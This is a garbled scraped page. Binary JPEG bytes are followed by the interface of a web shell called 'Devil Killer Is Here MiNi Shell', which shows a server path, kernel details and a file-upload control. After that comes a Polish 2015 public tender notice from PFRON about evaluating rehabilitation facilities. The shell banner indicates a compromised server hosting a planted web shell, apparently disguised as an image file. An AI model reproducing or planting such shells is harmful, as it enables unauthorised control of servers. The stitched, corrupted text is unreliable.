JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151117/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151117/308926-N-2015.html

<p class="kh_header"><b>Warszawa: Realizacja ewaluacji prowadzenia rehabilitacji w placówkach finansowanych ze środków PFRON w ramach zlecania realizacji zadań</b><br>
<b>Numer ogłoszenia: 308926 - 2015; data zamieszczenia: 17.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowy Fundusz Rehabilitacji Osób Niepełnosprawnych w Warszawie , al. Jana Pawła II 13, 00-828 Warszawa, woj. mazowieckie, tel. 022 5055494, faks 022 5055275.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Fundusz celowy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja ewaluacji prowadzenia rehabilitacji w placówkach finansowanych ze środków PFRON w ramach zlecania realizacji zadań.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. W ramach zamówienia Wykonawca(y) zrealizuje(ją) ewaluację prowadzenia rehabilitacji w placówkach finansowanych ze środków PFRON w ramach zlecania realizacji zadań (art. 36 ust. 1 ustawy z dnia 27 sierpnia 1997 roku o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych (Dz. U. z 2011 r. Nr 127, poz. 721 z późn, zm).
2. Szczegółowy Opis Przedmiotu Zamówienia stanowi Załącznik nr 1 do niniejszej SIWZ.
3. Zamawiający określa wymagania związane z realizacją zamówienia stosownie 
do art. 29 ust. 4, dotyczące klauzuli społecznej:
3.1. Wykonawca przyjmując do realizacji zamówienie musi zatrudnić przy wykonaniu zamówienia, co najmniej na etapie badań terenowych, minimum 1 osobę niepełnosprawną, o której mowa w przepisach o rehabilitacji zawodowej 
i społecznej oraz zatrudnianiu osób niepełnosprawnych;
3.2. Zamawiający ma prawo w każdym okresie realizacji zamówienia zwrócić się 
do Wykonawcy o przedstawienie dokumentacji zatrudnienia osoby niepełnosprawnej, natomiast Wykonawca ma obowiązek przedstawić ją niezwłocznie Zamawiającemu;
3.3. W przypadku nie zatrudnienia przy realizacji zamówienia wymaganej przez Zamawiającego osoby niepełnosprawnej, Wykonawca będzie zobowiązany 
do zapłacenia kary umownej w wysokości 10% kwoty, o której mowa w § 4 ust. 1 Załącznika nr 8 do SIWZ  (Istotne dla stron postanowienia, które zostaną wprowadzone do treści umowy w sprawie zamówienia publicznego)..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.31.50.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 136.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>VI. Warunki udziału Wykonawców w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków.
1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 oraz art. 24 ust. 2 ustawy. Zgodnie z art. 24 ust. 2a ustawy, Zamawiający wyklucza również z postępowania 
o udzielenie zamówienia Wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, 
w szczególności, gdy Wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co Zamawiający jest 
w stanie wykazać za pomocą dowolnych środków dowodowych. Zamawiający nie wyklucza z postępowania o udzielenie zamówienia Wykonawcy, który udowodni, 
że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszaniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia.
2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki 
z art. 22 ust. 1 ustawy tj.:
2.1.	Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania:
Z uwagi na charakter zamówienia, Zamawiający nie wyznacza szczegółowego opisu sposobu dokonywania oceny spełniania powyższych warunków udziału postępowaniu. Zamawiający dokona oceny spełnienia ww. warunków 
na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego zgodnie z treścią Załącznika nr 3 do SIWZ.
2.2. Posiadania wiedzy i doświadczenia:
Zamawiający uzna ww. warunek za spełniony jeżeli Wykonawca wykaże, 
że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał co najmniej 2 usługi polegające na przeprowadzeniu jakościowo-ilościowego badania społecznego, przy czy:
- każde z nich obejmowało swoim zasięgiem wszystkie województwa 
w Polsce, w tym przedmiotem przynajmniej jednego była rehabilitacja zawodowa lub/i społeczna osób niepełnosprawnych,
- wartość każdej usługi wynosiła co najmniej 160.000 zł.
W przypadku, gdy złożone przez Wykonawcę dokumenty dotyczące warunków udziału w postępowaniu zawierają informacje w innych walutach niż określono 
w niniejszej SIWZ, Zamawiający jako kurs przeliczeniowy waluty przyjmie kurs NBP z dnia publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. Jeżeli w dniu publikacji ogłoszenia o zamówieniu nie będzie opublikowany średni kurs walut przez NBP Zamawiający przyjmie kurs przeliczeniowy z ostatniej opublikowanej tabeli kursów NBP przed dniem publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.
2.3.	Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi 
do wykonania zamówienia:
Zamawiający uzna ww. warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował zespołem projektowo-badawczym, składającym się z co najmniej 5 osób, w tym: 
2.3.1	Kierownikiem badania, posiadającym wykształcenie wyższe (co najmniej tytuł magistra), który w okresie ostatnich 3 (trzech) lat przed upływem terminu składania ofert pełnił funkcję kierownika w co najmniej 3 (trzech) jakościowo - ilościowych badaniach społecznych, przy czym:
- każde z nich obejmowało swoim zasięgiem wszystkie województwa w Polsce, w tym przedmiotem przynajmniej jednego była rehabilitacja zawodowa lub/i społeczna osób niepełnosprawnych,
- przynajmniej w dwóch z tych badań przeprowadzono studia przypadków;
2.3.2	Metodologiem ds. badań jakościowych i ilościowych, posiadającym wykształcenie wyższe (co najmniej tytuł magistra),  który w okresie ostatnich 3 (trzech) lat przed upływem terminu składania ofert pełnił funkcję metodologa w co najmniej 3 (trzech) jakościowo - ilościowych badaniach społecznych, przy czym:
- każde z nich obejmowało swoim zasięgiem wszystkie województwa 
w Polsce, w tym przedmiotem przynajmniej jednego była rehabilitacja zawodowa lub/i społeczna osób niepełnosprawnych, 
- w ramach każdego z tych badań był odpowiedzialny za:
a) przygotowanie narzędzi do badań o charakterze ilościowym oraz analizę danych ilościowych,
b) przygotowanie narzędzi do badań o charakterze jakościowym oraz analizę danych jakościowych, 
- przynajmniej w dwóch z tych badań przeprowadzono studia przypadków;
2.3.3.	Ekspertem ds. rehabilitacji społecznej osób niepełnosprawnych, posiadającym stopień naukowy co najmniej doktora, specjalizującym się w zagadnieniach rehabilitacji społecznej osób niepełnosprawnych, w tym w funkcjonowaniu placówek rehabilitacji społecznej (np.: Środowiskowe Domy Samopomocy, Świetlice Terapeutyczne, Ośrodki Rehabilitacyjno-Edukacyjno-Wychowawcze, Ośrodki Wczesnej Interwencji, Domy Pomocy Społecznej, Warsztaty Terapii Zajęciowej), który w okresie ostatnich 3 (trzech) lat przed upływem terminu składania ofert był autorem/współautorem co najmniej 3 (trzech) opracowań (np. książek, raportów, analiz, artykułów) o ww. tematyce;
2.3.4.	Ekspertem ds. rehabilitacji ruchowej/usprawniającej osób niepełnosprawnych, posiadającym stopień naukowy co najmniej doktora, specjalizującym się w zagadnieniach rehabilitacji ruchowej/usprawniającej osób niepełnosprawnych, który w okresie ostatnich 3 (trzech) lat przed upływem terminu składania ofert był autorem/współautorem co najmniej 3 (trzech) opracowań (np. książek, raportów, analiz, artykułów) o ww. tematyce;
2.3.5.	Specjalistą ds. baz danych, posiadającym co najmniej dwuletnie doświadczenie w zakresie posługiwania się SQL (ang. Structured Query Language), w tym w tworzeniu zapytań w SQL.
Wyżej wymienionych funkcji w zespole projektowo-badawczym nie można łączyć ze sobą.
2.4.	Sytuacji ekonomicznej i finansowej:
Z uwagi na charakter zamówienia, Zamawiający nie wyznacza szczegółowego opisu sposobu dokonywania oceny spełniania powyższego warunku udziału postępowaniu. Zamawiający dokona oceny spełnienia ww. warunku na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego zgodnie z treścią Załącznika nr 3 do SIWZ.
3. Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana 
wg formuły spełnia/nie spełnia na podstawie dokumentów i oświadczeń załączonych 
do oferty. Z treści załączonych oświadczeń i dokumentów  winno jednoznacznie wynikać, że Wykonawca spełnia ww. warunki.
4. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonywania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonywania zamówienia. Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art. 26 ust. 2b ustawy, odpowiada solidarnie z Wykonawcą za szkodę Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.
VII. Wykaz oświadczeń i dokumentów, jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu oraz braku podstaw 
do wykluczenia z postępowania.
1. W celu wykazania braku podstaw do wykluczenia Wykonawcy z postępowania 
o udzielenie zamówienia na podstawie art. 24 ust. 1 i ust. 2 pkt 5 ustawy, Wykonawca zobowiązany jest załączyć do oferty:
1.1. Oświadczenie o braku podstaw do wykluczenia z postępowania, stanowiące Załącznik nr 4 do SIWZ.
1.2. Aktualny odpis z właściwego rejestru lub centralnej ewidencji i informacji 
o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu 
o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
1.3. Listę podmiotów należących do tej samej grupy kapitałowej, o której mowa 
w art. 24 ust. 2 pkt 5 ustawy, albo informację o tym, że Wykonawca nie należy 
do grupy kapitałowej (wg wzoru stanowiącego Załącznik nr 7 do SIWZ).
2. W celu wykazania spełniania warunków udziału w postępowaniu określonych w pkt 2 rozdziału VI SIWZ, Wykonawca zobowiązany jest załączyć do oferty:
2.1. Oświadczenie o spełnianiu warunków udziału w postępowaniu stanowiące Załącznik nr 3 do SIWZ.
2.2. Wykaz wykonanych głównych usług, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - 
w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania 
i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów, czy zostały wykonane należycie. Wykaz należy sporządzić zgodnie 
z Załącznikiem nr 5 do SIWZ.
Za główne usługi uznaje się usługi niezbędne do wykazania spełniania warunku określonego w pkt 2.2 rozdziału VI SIWZ.
Dowodami potwierdzającymi czy usługi zostały wykonane należycie są:
a) poświadczenie,
b) oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn 
o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w lit. a) powyżej. Jeśli Wykonawca składa oświadczenie, zobowiązany jest podać przyczyny braku możliwości uzyskania poświadczenia.
W przypadku, gdy Zamawiający (Państwowy Fundusz Rehabilitacji Osób Niepełnosprawnych) jest podmiotem, na rzecz którego usługi wskazane w wykazie usług zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów potwierdzających, o których mowa w lit. a) i b) powyżej.
W razie konieczności, szczególnie gdy wykaz lub dowody potwierdzające czy usługi zostały wykonane należycie budzą wątpliwości Zamawiającego lub gdy 
z poświadczenia albo z innego dokumentu wynika, że zamówienie nie zostało wykonane lub zostało wykonane nienależycie, Zamawiający może zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego usługi były wykonane, o przedłożenie dodatkowych informacji lub dokumentów bezpośrednio Zamawiającemu.
2.3. Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, 
w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami 
nt. ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych 
do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami potwierdzające spełnienie warunku opisanego w rozdziale VI pkt 2.3. SIWZ  (wg wzoru - Załącznik nr 6 do SIWZ);
3. W sytuacji, gdy Wykonawca wykazując spełnianie warunków, o których mowa w pkt 2 rozdziału VI SIWZ, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu 
do dyspozycji niezbędnych zasobów na potrzeby wykonywania zamówienia.
3.1. Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w pkt 2 rozdziału VI SIWZ, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, to Wykonawca zobowiązany jest przedstawić w odniesieniu 
do tych podmiotów dokumenty wymienione w pkt 1.1 - pkt. 1.2 powyżej.
3.2. Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w pkt 2 rozdziału VI SIWZ, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, Zamawiający, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, żąda złożenia dokumentów dotyczących:
- zakresu dostępnych Wykonawcy zasobów innego podmiotu,
- sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę przy wykonaniu zamówienia,
- charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem,
- zakresu i okresu udziału innego podmiotu przy wykonaniu zamówienia.
UWAGA:
4. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej zamiast dokumentu, o którym mowa w pkt 1.2 powyżej - składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
5. Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 4 powyżej, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. Dokumenty te powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
6. W przypadku wątpliwości co do treści dokumentu złożonego przez Wykonawcę mającego miejsce siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, Zamawiający może zwrócić się do właściwych organów odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, z wnioskiem o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu.
VIII. Informacja dla Wykonawców, którzy wspólnie składają ofertę (spółki cywilne/konsorcja).
1. W przypadku podmiotów wspólnie ubiegających się o zamówienie, każdy 
z Wykonawców musi złożyć dokumenty, o których mowa w pkt 1.1-1.3 rozdziału VII SIWZ. Oświadczenie wymienione w pkt 2.1 rozdziału VII SIWZ (Załącznik nr 3 do SIWZ) może być złożone przez każdego z tych Wykonawców (na jednym dokumencie pieczęcie i podpisy wszystkich Wykonawców) lub przez pełnomocnika, o którym mowa w pkt 2 poniżej. Dokumenty wymienione w pkt 2.2 - pkt 2.3 rozdziału VII SIWZ powinien złożyć w imieniu wszystkich co najmniej jeden Wykonawca, który spełnia wymagane warunki lub wszyscy Wykonawcy, którzy spełniają wymagane warunki łącznie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ww. warunek za spełniony jeżeli Wykonawca wykaże, 
że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał co najmniej 2 usługi polegające na przeprowadzeniu jakościowo-ilościowego badania społecznego, przy czym:
- każde z nich obejmowało swoim zasięgiem wszystkie województwa 
w Polsce, w tym przedmiotem przynajmniej jednego była rehabilitacja zawodowa lub/i społeczna osób niepełnosprawnych,
- wartość każdej usługi wynosiła co najmniej 160.000 zł.
W celu wykazania spełniania powyższego warunków udziału w postępowaniu, Wykonawca zobowiązany jest załączyć do oferty wykaz wykonanych głównych usług, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów, czy zostały wykonane należycie. Wykaz należy sporządzić zgodnie z Załącznikiem nr 5 do SIWZ.
W przypadku, gdy złożone przez Wykonawcę dokumenty dotyczące warunków udziału w postępowaniu zawierają informacje w innych walutach niż określono 
w niniejszej SIWZ, Zamawiający jako kurs przeliczeniowy waluty przyjmie kurs NBP z dnia publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. Jeżeli w dniu publikacji ogłoszenia o zamówieniu nie będzie opublikowany średni kurs walut przez NBP Zamawiający przyjmie kurs przeliczeniowy z ostatniej opublikowanej tabeli kursów NBP przed dniem publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter zamówienia, Zamawiający nie wyznacza szczegółowego opisu sposobu dokonywania oceny spełniania powyższego warunku udziału postępowaniu. Zamawiający dokona oceny spełnienia ww. warunku na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego zgodnie z treścią Załącznika nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ww. warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował zespołem projektowo-badawczym, składającym się z co najmniej 5 osób, w tym: 
2.3.1	Kierownika badania, posiadającego wykształcenie wyższe (co najmniej tytuł magistra), który w okresie ostatnich 3 (trzech) lat przed upływem terminu składania ofert pełnił funkcję kierownika w co najmniej 3 (trzech) jakościowo - ilościowych badaniach społecznych, przy czym:
- każde z nich obejmowało swoim zasięgiem wszystkie województwa w Polsce, w tym przedmiotem przynajmniej jednego była rehabilitacja zawodowa lub/i społeczna osób niepełnosprawnych,
- przynajmniej w dwóch z tych badań przeprowadzono studia przypadków;
2.3.2	Metodologa ds. badań jakościowych i ilościowych, posiadającego wykształcenie wyższe (co najmniej tytuł magistra),  który w okresie ostatnich 3 (trzech) lat przed upływem terminu składania ofert pełnił funkcję metodologa w co najmniej 3 (trzech) jakościowo - ilościowych badaniach społecznych, przy czym:
- każde z nich obejmowało swoim zasięgiem wszystkie województwa 
w Polsce, w tym przedmiotem przynajmniej jednego była rehabilitacja zawodowa lub/i społeczna osób niepełnosprawnych, 
- w ramach każdego z tych badań był odpowiedzialny za:
a) przygotowanie narzędzi do badań o charakterze ilościowym oraz analizę danych ilościowych,
b) przygotowanie narzędzi do badań o charakterze jakościowym oraz analizę danych jakościowych, 
- przynajmniej w dwóch z tych badań przeprowadzono studia przypadków;
2.3.3.	Eksperta ds. rehabilitacji społecznej osób niepełnosprawnych, posiadającego stopień naukowy co najmniej doktora, specjalizującym się 
w zagadnieniach rehabilitacji społecznej osób niepełnosprawnych, w tym w funkcjonowaniu placówek rehabilitacji społecznej (np.: Środowiskowe Domy Samopomocy, Świetlice Terapeutyczne, Ośrodki Rehabilitacyjno-Edukacyjno-Wychowawcze, Ośrodki Wczesnej Interwencji, Domy Pomocy Społecznej, Warsztaty Terapii Zajęciowej), który w okresie ostatnich 3 (trzech) lat przed upływem terminu składania ofert był autorem/współautorem co najmniej 3 (trzech) opracowań (np. książek, raportów, analiz, artykułów) o ww. tematyce;
2.3.4.	Eksperta ds. rehabilitacji ruchowej/usprawniającej osób niepełnosprawnych, posiadającego stopień naukowy co najmniej doktora, specjalizującym się w zagadnieniach rehabilitacji ruchowej/usprawniającej osób niepełnosprawnych, który w okresie ostatnich 3 (trzech) lat przed upływem terminu składania ofert był autorem/współautorem co najmniej 3 (trzech) opracowań (np. książek, raportów, analiz, artykułów) o ww. tematyce;
2.3.5.	Specjalisty ds. baz danych, posiadającego co najmniej dwuletnie doświadczenie w zakresie posługiwania się SQL (ang. Structured Query Language), w tym w tworzeniu zapytań w SQL.
